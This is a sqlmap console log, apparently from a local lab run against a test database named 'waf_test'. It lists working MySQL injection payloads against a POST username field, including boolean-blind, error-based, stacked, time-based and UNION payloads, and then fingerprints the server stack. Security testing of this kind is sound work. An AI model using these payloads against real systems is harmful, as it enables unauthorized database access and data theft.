        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.4#stable}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:02:52 /2025-10-24/

[14:02:53] [INFO] resuming back-end DBMS 'mysql' 
[14:02:53] [INFO] testing connection to the target URL
[14:02:53] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: username=test' AND 2850=(SELECT (CASE WHEN (2850=2850) THEN 2850 ELSE (SELECT 1620 UNION SELECT 8357) END))-- -&password=test

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: username=test' AND GTID_SUBSET(CONCAT(0x717a786b71,(SELECT (ELT(1684=1684,1))),0x71706a6271),1684)-- RBWi&password=test

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: username=test';SELECT SLEEP(5)#&password=test

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=test' AND (SELECT 5353 FROM (SELECT(SLEEP(5)))Jmvn)-- RnxI&password=test

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: username=-9641' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a786b71,0x70547750426f7a48704e776d4f41466e7372784549536a7245737853727168415a49645166647051,0x71706a6271),NULL-- -&password=test
---
[14:02:53] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.24.0, PHP 8.1.33
back-end DBMS: MySQL >= 5.6
[14:02:53] [INFO] fetching current database
current database: 'waf_test'
[14:02:53] [INFO] fetched data logged to text files under '/home/sunnnp/.local/share/sqlmap/output/localhost'
[14:02:53] [WARNING] your sqlmap version is outdated

[*] ending @ 14:02:53 /2025-10-24/

